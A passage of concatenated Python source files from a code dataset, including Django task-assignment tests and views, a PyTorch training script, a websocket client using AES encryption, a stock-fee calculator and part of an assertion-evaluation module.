self.workers[0], 0)\n self.assertEquals(form.fields['currently_assigned_to'].initial,\n self.workers[0].id)\n\n # Human task under review\n # (Test form init with both an entry-level worker and reviewer)\n human_task = assign_task(self.workers[1].id, human_task.id)\n form = TaskForm(instance=human_task)\n with patch('orchestra.utils.task_lifecycle._is_review_needed',\n return_value=False):\n human_task = submit_task(human_task.id, {},\n TaskAssignment.SnapshotType.ACCEPT,\n self.workers[1], 0)\n self.assertEquals(form.fields['currently_assigned_to'].initial,\n self.workers[1].id)\n\n # Machine task was created\n # (Test form init with a machine task)\n self.assertEquals(Task.objects.filter(project=project).count(),\n 2)\n machine_task = (Task.objects.filter(project=project)\n .exclude(id=human_task.id).first())\n form = TaskForm(instance=machine_task)\n self.assertEquals(form.fields['currently_assigned_to'].initial,\n None)\n\n def test_task_form_save(self):\n \"\"\"\n Test task form save for new, human and machine tasks\n \"\"\"\n workflow_version = self.workflow_versions['test_workflow']\n human_step = self.workflow_steps[workflow_version.slug]['step1']\n project = ProjectFactory(workflow_version=workflow_version)\n\n # Add new task to project\n form = TaskForm({'project': project.id,\n 'status': Task.Status.AWAITING_PROCESSING,\n 'step': human_step.id,\n 'start_datetime': timezone.now()})\n form.is_valid()\n self.assertTrue(form.is_valid())\n task = form.save()\n self.assertFalse(task.assignments.exists())\n\n # Add new task to project and assign to entry_level worker (0)\n form = TaskForm({'project': project.id,\n 'status': Task.Status.AWAITING_PROCESSING,\n 'step': human_step.id,\n 'start_datetime': timezone.now()})\n self.assertTrue(form.is_valid())\n form.cleaned_data['currently_assigned_to'] = self.workers[0].id\n task = form.save()\n self.assertTrue(is_worker_assigned_to_task(self.workers[0],\n task))\n self.assertEquals(assignment_history(task).count(), 1)\n self.assertTrue(task.assignments.exists())\n self.assertEquals(task.status, Task.Status.PROCESSING)\n\n # Render task with preexisting entry_level assignment (0) and reassign\n # to another entry_level worker (4)\n form = TaskForm(model_to_dict(task), instance=task)\n self.assertEquals(form.fields['currently_assigned_to'].initial,\n self.workers[0].id)\n form.is_valid()\n self.assertTrue(form.is_valid())\n form.cleaned_data['currently_assigned_to'] = self.workers[4].id\n task = form.save()\n self.assertTrue(is_worker_assigned_to_task(self.workers[4],\n task))\n self.assertEquals(assignment_history(task).count(), 1)\n self.assertEquals(task.status, Task.Status.PROCESSING)\n\n # Submit task\n with patch('orchestra.utils.task_lifecycle._is_review_needed',\n return_value=True):\n task = submit_task(task.id, {},\n TaskAssignment.SnapshotType.SUBMIT,\n self.workers[4], 0)\n\n # Assign to reviewer (1) and reassign to another reviewer (3)\n task = assign_task(self.workers[1].id, task.id)\n self.assertTrue(task.status, Task.Status.REVIEWING)\n self.assertTrue(is_worker_assigned_to_task(self.workers[1],\n task))\n task = Task.objects.get(id=task.id)\n form = TaskForm(model_to_dict(task), instance=task)\n self.assertEquals(form.fields['currently_assigned_to'].initial,\n self.workers[1].id)\n self.assertTrue(form.is_valid())\n form.cleaned_data['currently_assigned_to'] = self.workers[3].id\n task = form.save()\n self.assertTrue(is_worker_assigned_to_task(self.workers[3],\n task))\n self.assertEquals(assignment_history(task).count(), 2)\n self.assertEquals(task.status, Task.Status.REVIEWING)\n\n # Attempt to reassign to non-certified worker (2)\n form = TaskForm(model_to_dict(task), instance=task)\n self.assertTrue(form.is_valid())\n form.cleaned_data['currently_assigned_to'] = self.workers[2].id\n with self.assertRaises(WorkerCertificationError):\n form.save()\n","sub_path":"orchestra/tests/test_admin.py","file_name":"test_admin.py","file_ext":"py","file_size_in_byte":7391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"45054728","text":"import csv\nimport random\n\nq = 0 \nace = 0\nquestionsList = []\nanswersList = []\nscore = []\n\nprint(\"Math test\")\nname = input(\"Please, introduce you name: \")\nprint(\"Good luck!\\n\")\n\nwhile q != 5:\n num1 = random.randint(1, 99)\n num2 = random.randint(1, 99)\n\n ans = int(input(str(num1) + \"+\" + str(num2) + \"=\")) \n q += 1\n if ans == num1 + num2:\n \tace += 1\n questionsList.append(str(num1) + \"+\" + str(num2))\n answersList.append(ans)\n\n\nprint(\"\\nEnd of the test, you score \" + str(ace) + \"/5.\")\n\nscore = str(ace) + \"/5\"\nquestions = \", \".join([str(elem) for elem in questionsList])\nanswers = \", \".join([str(elem) for elem in answersList])\n\ntest = []\ntest.append(name)\ntest.append(questions)\ntest.append(answers)\ntest.append(score)\n\nprint(test)\n\n\nwith open(\"MathTests.csv\", \"a\") as file:\n\twriter = csv.writer(file, delimiter='\\t')\n\twriter.writerow(str(elem) for elem in test)","sub_path":"14_Reading_and_Writing_to_a_csv_File/Problema_117.py","file_name":"Problema_117.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"53245769","text":"from warnings import warn\nfrom django.conf import settings\n\n#: A list of one or more sitemaps to inform robots about:\nSITEMAP_URLS = []\nSITEMAP_URLS.extend(getattr(settings, 'ROBOTS_SITEMAP_URLS', []))\n\n#: A list of one or more sitemaps views used to render sitemaps in the current project:\n#: The defaults are the ones that come fromm django, but if the users override them\n#: we just extend the list. If the urls have no reverse lookup, we won't embed them in the robots\nSITEMAP_VIEWS = ['django.contrib.sitemaps.views.index', 'django.contrib.sitemaps.views.sitemap']\nSITEMAP_VIEWS.extend(getattr(settings, 'ROBOTS_SITEMAP_VIEWS', []))\n\n# For backwards-compatibility, we'll automatically add a single URL\n# to the list:\nSITEMAP_URL = getattr(settings, 'ROBOTS_SITEMAP_URL', None)\nif SITEMAP_URL is not None:\n warn(\"The ``SITEMAP_URL`` setting is deprecated. \"\n \"Use ``SITEMAP_URLS`` instead.\", PendingDeprecationWarning)\n SITEMAP_URLS.append(SITEMAP_URL)\n\nUSE_SITEMAP = getattr(settings, 'ROBOTS_USE_SITEMAP', True)\nEXCLUDE_URL_NAMES = getattr(settings, 'ROBOTS_EXCLUDE_URL_NAMES', [])\nCACHE_TIMEOUT = getattr(settings, 'ROBOTS_CACHE_TIMEOUT', None)\n\nADMIN = '/admin/'\n","sub_path":"robots/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"466361733","text":"\"\"\"\nShow some text as a corner annotation.\nFonts: arial, courier, times.\n\"\"\"\nfrom vtkplotter import show, Text, Cube\n\nwith open(\"annotations.py\") as fname:\n t = fname.read()\n\nactor2d = Text(t, pos=3, s=1.2, c='k', bg=\"lb\", font=\"courier\")\n\nshow(actor2d, Cube(), verbose=0, axes=0)\n","sub_path":"examples/plotting2d/annotations.py","file_name":"annotations.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"76519287","text":"# Utility to calculate Rakuten Trade fees\nfrom math import ceil\n\nprint('Please input total share number to purchase ')\nshare_no = int(input())\n\nprint('Please input purchse price')\nmarket_price = float(input())\n\nprint('Stamp Duty exemption? y / n')\nmarket_exempt = True if input() == 'y' else False\n\ntotal_price = share_no * market_price\n\n# Calculate broker_fee\nif total_price < 1000:\n\tbroker_fee = 7\nelif total_price >= 1000 and total_price <= 9999.99:\n\tbroker_fee = 8\nelif total_price >= 10000 and total_price <= 99999.99:\n\tbroker_fee = total_price * 0.001\nelse:\n\tbroker_fee = 100\n\n# Calulate clearing fee\nclearing_fee = float(min(total_price * 0.0003, 1000))\n\n# Calculate stamp duty\nif market_exempt is True:\n\tstamp_duty = 0\nelse:\n\tstamp_duty = ceil(total_price / 1000)\n\tstamp_duty = min(200, stamp_duty)\n\n# Calculate sst\nsst = broker_fee * 0.06\n\ntotal_cost = clearing_fee + stamp_duty + broker_fee + sst\ntotal_fee = total_price + clearing_fee + stamp_duty + broker_fee + sst\n\nprint('The total broker fee is %.2f' % broker_fee)\nprint('The total clearing fee is %.2f' % clearing_fee)\nprint('The total stamp duty is %.2f' % stamp_duty)\nprint('The total SST is %.2f' % sst)\nprint('The total transaction cost is %.2f' % total_cost)\nprint('The total fee is : %.2f' % total_fee)\n","sub_path":"rakuten.py","file_name":"rakuten.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"168681175","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\n\"\"\"\nmail:wqc2008@gmail.com\n@createtime: 17/10/30 下午4:44\n@license: Apache Licence 2.0\nusege:\n ......\n\n\"\"\"\n\nimport time\nimport pymongo\nimport requests\nfrom pymongo import ReturnDocument\n\nfrom settings import MONGO_DATABASE,MONGO_URI,CURRENT_SITE_NAME,BOT_NAME\n\nclient = pymongo.MongoClient(MONGO_URI)\ndb = client[MONGO_DATABASE]\nurl = \"http://localhost:6800/schedule.json\"\n\ni = 0\nwhile True:\n\n where = {\"status\": 0}\n updata = {'$set': {'status': 1}}\n sort = [('inc_num', pymongo.ASCENDING)]\n\n result = db[\"articles\"].find_one_and_update(where, updata, sort=sort, return_document=ReturnDocument.AFTER)\n\n if result != None:\n\n data = {\"project\": BOT_NAME, \"spider\": 'ddetails', \"site_name\": CURRENT_SITE_NAME, \"article_name\": result['title'],\n \"article_url\": result['url']}\n r = requests.post(url, data)\n print(r.text)\n\n else:\n\n print(\"在数据库中pages中状态为0 已经为空\")\n break\n\n i = i + 1\n\n if i % 10 == 0:\n time.sleep(3)\n\n","sub_path":"ebook/rebot_ddetails.py","file_name":"rebot_ddetails.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"289212555","text":"# -*- coding: utf-8 -*-\n# @Time : Thu Mar 7 13:49:02 2019\n# @Author : Yao Qiang\n# @Email : qiangyao1988wsu@gmail.com\n# @File : Train.py\n# @Software: Spyder\n# @Pythpon Version: python3.6\n\n\nimport torch\nimport torch.optim as optim\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport CreateModel \nimport TrainSet \n\ndef train(epoch):\n '''\n train model\n '''\n \n # The net is in training model, so we can use drop out\n net.train() \n correct = 0\n sum = 0\n T = 0\n \n \n running_loss = 0.0\n\n for batch_index, (datas, labels) in enumerate(trainloader, 0):\n labels = labels.max(1)[1]\n datas = Variable(datas).float()\n datas = datas.view(-1, 1, 256, 256)\n labels = Variable(labels).long()\n \n if torch.cuda.is_available():\n datas = datas.cuda()\n labels = labels.cuda()\n \n # forward\n optimizer.zero_grad()\n outputs = net(datas)\n loss = criterion(outputs, labels)\n \n # back\n loss.backward()\n optimizer.step()\n \n \n # print statistics\n running_loss += loss.item()\n \n T += 1\n pred_choice = outputs.data.max(1)[1]\n correct += pred_choice.eq(labels.data).cpu().sum()\n sum += len(labels)\n # accuracy = correct / sum\n \n if batch_index % 100 == 99:\n print('[%d,%4d] loss: %.3f' %\n (epoch + 1, batch_index + 1, running_loss))\n running_loss = 0.0\n print('Accuracy of the network: %d %%' % (100 * correct / sum))\n \n ''' \n print('batch_index: [%d/%d]' % (batch_index, len(trainloader)),\n 'Train epoch: [%d]' % (epoch),\n 'correct/sum:[%d/%d]' % (correct, sum),\n 'accuracy:[%d]' % (accuracy))\n '''\n\n\n\n\ndef eval(epoch):\n '''\n eval mode\n '''\n # The net is in eval model, so we can not use drop out, and stop backpropagation\n net.eval() \n correct = 0\n sum = 0\n \n for batch_index, (datas, labels) in enumerate(evalloader, 0):\n labels = labels.max(1)[1]\n datas = Variable(datas).cuda().float()\n datas = datas.view(-1, 1, 256, 256)\n labels = Variable(labels).cuda().long()\n # optimizer.zero_grad()\n outputs = net(datas)\n # loss = criterion(outputs, labels)\n # loss.backward()\n # optimizer.step()\n\n pred_choice = outputs.data.max(1)[1]\n correct += pred_choice.eq(labels.data).cpu().sum()\n sum += len(labels)\n \n # accuracy = correct / sum\n ''' \n print('batch_index: [%d/%d]' % (batch_index, len(evalloader)),\n 'Eval epoch: [%d]' % (epoch),\n 'correct/sum:%d/%d' % (correct, sum),\n 'accuracy:[%d]' % (accuracy))\n ''' \n\nif __name__ == '__main__':\n \n n_epoch, batch_size = 1, 8\n \n # create trainloader and evalloader\n trainset = TrainSet.TrainSet(eval=False)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True)\n evalset = TrainSet.TrainSet(eval=True)\n evalloader = torch.utils.data.DataLoader(evalset, batch_size=batch_size, shuffle=True)\n \n net = CreateModel.net()\n \n if torch.cuda.is_available():\n net.cuda()\n \n # loss function \n criterion = nn.CrossEntropyLoss()\n\n #optimizer\n optimizer = optim.SGD(net.parameters(), lr=1e-3, momentum=0.9, weight_decay=1e-4)\n\n \n \n # Whether to load model parameters\n load = False\n\n if load:\n checkpoint = CreateModel.load_checkpoint()\n net.load_state_dict(checkpoint['state_dict'])\n start_epoch = checkpoint['epoch'] + 1\n else:\n start_epoch = 0\n\n\n for epoch in range(start_epoch, n_epoch):\n train(epoch)\n\n # save checkpoint\n checkpoint = {'epoch': epoch, 'state_dict': net.state_dict(), 'optimizer': optimizer.state_dict()}\n CreateModel.save_checkpoint(checkpoint)\n\n eval(epoch)","sub_path":"scripts/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":4054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"118679900","text":"from settings import *\nimport random\n\nlanguage_wakeWords = ['computer']\nlanguage_politeWords = ['please', 'thanks', 'sorry', 'thank', 'por', 'favor']\nlanguage_rudeWords = ['fuck', 'shit', 'bitch']\n\ninsults = ['stupid human', 'idiot', 'meat bag']\n\ndef isRude(words):\n score = 0\n for word in words:\n if word in language_rudeWords:\n score += 1\n\n if (score >= rudeThreshold):\n return True\n return False\n\ndef randomInsult():\n return random.choice(insults)","sub_path":"logic/language.py","file_name":"language.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"276831753","text":"from django.shortcuts import render, redirect # 追加\nfrom django.contrib.auth import authenticate, login # 追加 \nfrom .forms import CustomUserCreationForm # 追加\nfrom django.shortcuts import get_object_or_404, render, redirect \nfrom .models import Product\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.http import require_POST\nfrom django.contrib import messages # 追加 \nfrom .forms import AddToCartForm # 追加\n\n\n\n\ndef index(request):\n products = Product.objects.all().order_by('-id')\n return render(request, 'app/index.html', {'products': products})\n\n\ndef signup(request):\n if request.method == 'POST':\n form = CustomUserCreationForm(request.POST)\n if form.is_valid():\n new_user = form.save()\n input_email = form.cleaned_data['email']\n input_password = form.cleaned_data['password1']\n new_user = authenticate(email=input_email,password=input_password)\n if new_user is not None:\n login(request, new_user)\n return redirect('app:index')\n else:\n form = CustomUserCreationForm()\n return render(request, 'app/signup.html', {'form': form})\n\ndef detail(request, product_id):\n product = get_object_or_404(Product, pk=product_id)\n add_to_cart_form = AddToCartForm(request.POST or None)\n if add_to_cart_form.is_valid():\n num = add_to_cart_form.cleaned_data['num']\n\n # セッションに cart というキーがあるかどうかで処理を分ける \n if 'cart' in request.session:\n # すでに特定の商品の個数があれば新しい個数を加算、なければ新しくキ ーを追加する\n if str(product_id) in request.session['cart']:\n request.session['cart'][str(product_id)] += num\n else:\n request.session['cart'][str(product_id)] = num\n else:\n # 新しく cart というセッションのキーを追加 \n request.session['cart'] = {str(product_id): num}\n messages.success(request, f\"{product.name}を{num}個カートに入れました!\")\n return redirect('app:detail', product_id=product_id)\n context = {\n 'product': product,\n 'add_to_cart_form': add_to_cart_form,\n }\n\n return render(request, 'app/detail.html', context)\n\n@login_required\n@require_POST\ndef toggle_fav_product_status(request):\n product = get_object_or_404(Product, pk=request.POST[\"product_id\"])\n user = request.user\n if product in user.fav_products.all():\n user.fav_products.remove(product)\n else:\n user.fav_products.add(product)\n return redirect('app:detail', product_id=product.id)\n\n@login_required\ndef fav_products(request):\n user = request.user\n products = user.fav_products.all()\n return render(request, 'app/index.html', {'products': products})\n\n\n@login_required \ndef cart(request):\n cart = request.session.get('cart', {})\n cart_products = dict()\n total_price = 0\n for product_id, num in cart.items():\n product = Product.objects.get(id=product_id)\n cart_products[product] = num\n total_price += product.price * num\n context = {\n 'cart_products': cart_products,\n 'total_price': total_price,\n }\n return render(request, 'app/cart.html', context)\n\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"621946825","text":"# !/usr/bin/env python\n\n# WS client example\n\nimport asyncio\nimport base64\nimport json\nimport time\n\nimport websockets\nimport binascii\n\nfrom Crypto.Cipher import AES\nfrom Crypto.Util import Counter\nfrom Crypto import Random\n\nkey_bytes = 16\napi_key = base64.b64decode(\"3cYdoIdwr3b49eyuH92oPw==\")\n\n\ndef encrypt(key, plaintext):\n assert len(key) == key_bytes\n\n # Choose a random, 16-byte IV.\n iv = Random.new().read(AES.block_size)\n\n # Convert the IV to a Python integer.\n iv_int = int(binascii.hexlify(iv), 16)\n\n # Create a new Counter object with IV = iv_int.\n ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)\n\n # Create AES-CTR cipher.\n aes = AES.new(key, AES.MODE_CTR, counter=ctr)\n\n # Encrypt and return IV and ciphertext.\n ciphertext = aes.encrypt(plaintext)\n return iv + ciphertext\n\n\ndef decrypt(key, ciphertext):\n assert len(key) == key_bytes\n\n # Convert the IV to a Python integer.\n iv_int = int(binascii.hexlify(ciphertext[:16]), 16)\n\n # Create a new Counter object with IV = iv_int.\n ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)\n\n # Create AES-CTR cipher.\n aes = AES.new(key, AES.MODE_CTR, counter=ctr)\n\n # Decrypt and return the plaintext.\n plaintext = aes.decrypt(ciphertext[16:])\n return plaintext\n\n\nasync def hello():\n websocket = await websockets.connect('ws://localhost:3145', ping_timeout=None)\n\n req = {\n \"type\": \"balance_info\",\n \"account_id\": '1',\n \"id\": 1,\n }\n await websocket.send(str(base64.standard_b64encode(encrypt(api_key, json.dumps(req))), \"utf-8\"))\n print('send request origin ', req)\n print('send request encrypt ', str(base64.standard_b64encode(encrypt(api_key, json.dumps(req))), \"utf-8\"))\n\n while True:\n response = await websocket.recv()\n print(\"receive response encrypt \", response)\n response = decrypt(api_key, base64.b64decode(response))\n response = json.loads(response)\n\n # if resp['type'] == 'balance_changed' or resp['type'] == 'balance_info':\n # print(f\"balance_changed {response}\")\n\n # if resp['type'] == 'sync_changed' and resp['is_synchronized']:\n # print(f\"sync_changed or is_synchronized {response}\")\n\n print(\"receive response origin \", response)\n time.sleep(5)\nasyncio.get_event_loop().run_until_complete(hello())\n\n\n\n\n\n\n\n\n# send request origin {'type': 'balance_info', 'account_id': '1', 'id': 1}\n# send request encrypt QwVxuiPXH5YTUSRv1aJ+Y2ZpjwT1Q+QXcyP0q2oKrtEGrsabzcJPa+LXrLfKTHwzMV/0CNWC+Ho4yT6ec5D5STkp19s=\n# receive response encrypt kdufVAXA0YH/rRt/eJ17znoBHaU9ahx7vq4CtbY5X0+zlqZgQ08032ACQ0Si3B8q9F1o9DMznxGu4AV8XJqPWlK57jlk7xvIbDmnlav+kqCLHLfk8DLpk07BPBh8aEIQU5XiCOrfRYzPQjWPsRUdyLmd7A==\n# receive response origin {'account_id': '1', 'type': 'balance_info', 'balance': 1782764007, 'available_balance': 1782764007, 'id': 1}\n# receive response encrypt Sr7ulOn//xciIdQuRf5nqpgu7x79CCFVU2JLYzaDcFMRgE1FW3Mun3oJEHCO+32X/HU0tM9IiYNkDk5em/CSZYVG87dnSXzbwyWp6NODXVag3o+/GaWP\n# receive response origin {'type': 'rollback_micro_block', 'epoch': 14020, 'offset': 59, 'statuses': {}}","sub_path":"websocket_example.py","file_name":"websocket_example.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"9774113","text":"\"\"\"CallHubTest URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.contrib.auth import views as auth_views\n\nfrom ticketApp import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('logout/', auth_views.LogoutView.as_view(), name='logout'),\n path('', views.home, name='home'),\n path('login/', auth_views.LoginView.as_view(), name='login'),\n path('register/', views.register, name='register'),\n path('create/', views.create, name='create'),\n path('open/', views.open_tickets, name='open'),\n path('closed/', views.closed_tickets, name='closed'),\n path('open/edit//', views.edit_tickets, name='edit'),\n path('open/edit//close_this_ticket', views.close_the_ticket, name='close_ticket')\n]\n","sub_path":"CallHubTest/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"153872425","text":"import os\nimport pandas as pd\n\nfrom celescope.__init__ import __VERSION__, ASSAY_DICT\nimport celescope.tools.utils as utils\nfrom celescope.tools.__init__ import __PATTERN_DICT__\nfrom celescope.tools.barcode import Chemistry\nfrom celescope.tools.step import Step, s_common\n\n\n@utils.add_log\ndef sample(args):\n \n step_name = \"sample\"\n step = Step(args, step_name)\n\n sample_name = args.sample\n assay = args.assay\n assay_description = ASSAY_DICT[assay]\n version = __VERSION__\n outdir = args.outdir\n chemistry = args.chemistry\n\n # get chemistry\n if chemistry == 'auto':\n fq1 = args.fq1\n ch = Chemistry(fq1)\n chemistry = ch.check_chemistry()\n chemistry = \",\".join(set(chemistry))\n else:\n chemistry = args.chemistry\n \n\n if not os.path.exists(outdir):\n os.system('mkdir -p %s' % outdir)\n\n stat = pd.DataFrame({\n \"item\": [\"Sample ID\", \"Assay\", \"Chemistry\", \"Software Version\"],\n \"count\": [sample_name, assay_description, chemistry, version],\n },\n columns=[\"item\", \"count\"]\n )\n stat_file = outdir + \"/stat.txt\"\n stat.to_csv(stat_file, sep=\":\", header=None, index=False)\n\n step.clean_up()\n\n return chemistry\n\n\ndef get_opts_sample(parser, sub_program):\n if sub_program:\n parser = s_common(parser)\n parser.add_argument('--fq1', help='read1 fq file')\n parser.add_argument('--chemistry', choices=list(__PATTERN_DICT__.keys()), help='chemistry version', default='auto')\n return parser\n \n","sub_path":"celescope/tools/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"170705431","text":"# Copyright 2019 Katteli Inc.\n# TestFlows.com Open-Source Software Testing Framework (http://testflows.com)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport ast\nimport copy\nimport inspect\nimport pprint\nimport difflib\nimport textwrap\nimport linecache\nimport itertools\nimport builtins\n\n__all__ = [\"error\", \"errors\", \"values\"]\n\n\nclass values(object):\n \"\"\"Obtains value so that expression\n does not need to be reinterpreted if\n assertion fails.\n \"\"\"\n\n __slots__ = (\"stack\",)\n\n def __init__(self):\n self.stack = []\n\n def __enter__(self):\n return self\n\n def __call__(self, x):\n self.stack.append(x)\n return x\n\n def __exit__(self, *args):\n pass\n\n\nclass AssertEval(ast.NodeVisitor):\n \"\"\"Asssertion expression evaluator.\n\n :param frame: frame where the assertion occured\n \"\"\"\n\n # Known types\n _simple = (\n ast.Num,\n ast.Str,\n ast.NameConstant,\n ast.Attribute,\n ast.Call,\n ast.BinOp,\n ast.UnaryOp,\n ast.IfExp,\n ast.BoolOp,\n ast.List,\n ast.Tuple,\n ast.Set,\n ast.Dict,\n ast.Starred,\n ast.Compare,\n )\n\n # operator symbols\n _op_symbols = {\n # boolean ops\n ast.And: \"and\",\n ast.Or: \"or\",\n # binary ops\n ast.Add: \"+\",\n ast.Sub: \"-\",\n ast.Mult: \"*\",\n ast.Div: \"/\",\n ast.Mod: \"%\",\n ast.Pow: \"**\",\n ast.LShift: \"<<\",\n ast.RShift: \">>\",\n ast.BitOr: \"|\",\n ast.BitXor: \"^\",\n ast.BitAnd: \"&\",\n ast.FloorDiv: \"//\",\n # compare ops\n ast.Eq: \"==\",\n ast.NotEq: \"!=\",\n ast.Lt: \"<\",\n ast.LtE: \"<=\",\n ast.Gt: \">\",\n ast.GtE: \">=\",\n ast.Is: \"is\",\n ast.IsNot: \"is not\",\n ast.In: \"in\",\n ast.NotIn: \"not in\",\n # unary ops\n ast.Invert: \"~\",\n ast.Not: \"not\",\n ast.UAdd: \"+\",\n ast.USub: \"-\",\n }\n\n # boolean operators\n _boolean_ops = {\n ast.And: lambda left, right: left and right,\n ast.Or: lambda left, right: left or right,\n }\n\n # binary operators\n _binary_ops = {\n ast.Add: lambda left, right: left + right,\n ast.Sub: lambda left, right: left - right,\n ast.Mult: lambda left, right: left * right,\n ast.Div: lambda left, right: left / right,\n ast.Mod: lambda left, right: left % right,\n ast.Pow: lambda left, right: left**right,\n ast.LShift: lambda left, right: left << right,\n ast.RShift: lambda left, right: left >> right,\n ast.BitOr: lambda left, right: left | right,\n ast.BitXor: lambda left, right: left ^ right,\n ast.BitAnd: lambda left, right: left & right,\n ast.FloorDiv: lambda left, right: left // right,\n }\n\n # unary operators\n _unary_ops = {\n ast.Invert: lambda operand: ~operand,\n ast.Not: lambda operand: not operand,\n ast.UAdd: lambda operand: +operand,\n ast.USub: lambda operand: -operand,\n }\n\n # comparison operators\n _compare_ops = {\n ast.Eq: lambda left, right: left == right,\n ast.NotEq: lambda left, right: left != right,\n ast.Lt: lambda left, right: left < right,\n ast.LtE: lambda left, right: left <= right,\n ast.Gt: lambda left, right: left > right,\n ast.GtE: lambda left, right: left >= right,\n ast.Is: lambda left, right: left is right,\n ast.IsNot: lambda left, right: left is not right,\n ast.In: lambda left, right: left in right,\n ast.NotIn: lambda left, right: left not in right,\n }\n\n class FuncResult(object):\n \"\"\"Result wrapper.\"\"\"\n\n def __init__(self, result):\n self.result = result\n\n def __repr__(self):\n return \"= \" + _saferepr(self.result)\n\n class DiffResult(object):\n \"\"\"Compare diffable result wrapper.\"\"\"\n\n def __init__(self, result, diff):\n self.result = result\n self.diff = diff\n\n def __repr__(self):\n return _saferepr(self.result) + \"\\n\" + self.diff\n\n def __init__(self, frame, frame_info):\n def error(desc=None):\n pass\n\n self.frame = frame\n self.frame_info = frame_info\n self.f_globals = self.frame.f_globals\n self.f_locals = dict(self.frame.f_locals)\n self.f_locals[\"error\"] = error\n self.nodes = []\n self.expression = None\n self._is_assert = False\n\n def eval(self):\n \"\"\"Evaluate assert expression.\"\"\"\n expression_ast = None\n if self.expression:\n expression_ast = ast.parse(self.expression)\n else:\n code = (\n self.frame_info.code_context[0].strip()\n if self.frame_info.code_context\n else None\n )\n if code is not None:\n expression = \"\"\n expression_ast = None\n sourcelines, startline = inspect.getsourcelines(self.frame)\n startline = max(1, startline)\n for i in range(self.frame_info.lineno - startline + 1, 0, -1):\n expression = sourcelines[i - 1] + expression\n try:\n self.expression = textwrap.dedent(expression).strip()\n expression_ast = ast.parse(self.expression)\n break\n except SyntaxError as e:\n pass\n self.expression = self.expression.split(\"\\n\")\n if expression_ast:\n self.visit(expression_ast)\n return self.expression, self.nodes\n\n def _diff(self, op, result, left, right):\n \"\"\"Return result that includes diff\n for a few left and right types.\n\n :param op: operator\n :param result: result of the comparison\n :param left: left side comparison value\n :param right: right side comparison value\n \"\"\"\n if (not op is ast.Eq) or result:\n return result\n\n diff_types = (str, list, tuple, dict, set)\n if (\n isinstance(left, diff_types)\n and isinstance(right, diff_types)\n and isinstance(right, type(left))\n ):\n if isinstance(left, str):\n left_repr = left.splitlines()\n right_repr = right.splitlines()\n else:\n left_repr = pprint.pformat(left).splitlines()\n right_repr = pprint.pformat(right).splitlines()\n diff = \"\\n\".join(\n itertools.islice(\n difflib.unified_diff(left_repr, right_repr, n=0, lineterm=\"\"),\n 2,\n None,\n )\n )\n return self.DiffResult(result, diff)\n\n return result\n\n def _find_operator(self, op_type, lineno, col_offset):\n \"\"\"Find an operator offset which is right before\n the specified line number and column offset.\n\n :param lineno: line number\n :param col_offset: column offset\n \"\"\"\n expression = self.expression[:lineno]\n expression[-1] = expression[-1][: col_offset + 1].rstrip(\"({[\")\n op_sym = self._op_symbols.get(op_type, None)\n if op_sym is None:\n raise RuntimeError(\"unknown operator type '%s'\" % op_type)\n for lineno, line in reversed(list(enumerate(expression, 1))):\n idx = line.rfind(op_sym)\n if idx >= 0:\n break\n # if we did not find the operator returns (1, -1)\n return lineno, idx\n\n def visit_Module(self, node):\n return self.visit(node.body[0])\n\n def visit_Expr(self, node):\n if not self._is_assert:\n raise RuntimeError(\"not called from the assert statement\")\n return self.visit(node.value)\n\n def visit_Assert(self, node):\n self._is_assert = True\n result = bool(self.visit(node.test))\n self.nodes.append((result, node))\n return result\n\n def visit_Compare(self, node):\n left = self.visit(node.left)\n result = left\n if not isinstance(node.left, self._simple):\n self.nodes.append((result, 